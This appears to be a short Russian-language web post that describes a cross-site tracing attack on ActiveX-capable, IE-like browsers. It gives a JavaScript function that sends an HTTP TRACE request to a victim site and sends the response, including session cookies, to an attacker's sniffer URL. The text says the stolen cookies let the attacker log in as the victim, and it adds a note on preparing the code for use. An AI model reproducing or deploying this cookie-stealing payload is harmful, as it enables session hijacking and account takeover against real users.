Атака на IE подобные браузеры

Пример атаки на браузеры, поддержующие ActiveX технологию. Скрипт должен выполнится в браузере жертвы.
Сначала отправляет HTTP запрос на сниффер, а затем ответ сервера. При условии, что сервер был уязвим, в логах Вы сможете найти cookie жертвы, которые можно будет использовать для авторизации от имени жертвы.
Примерный исходник: (исключительно для примера, работоспособность не гарантируется)

function sendTrace () {
var xmlHttp = new ActiveXObject(«Microsoft.XMLHTTP»);
xmlHttp.open(«TRACE», «http://[victim].com»,false);
xmlHttp.send();
window.location=(«http://[attacker-host].com/sniffer.php?query=» + xmlHttp.responseText)
}

_ при использовании необходимо убрать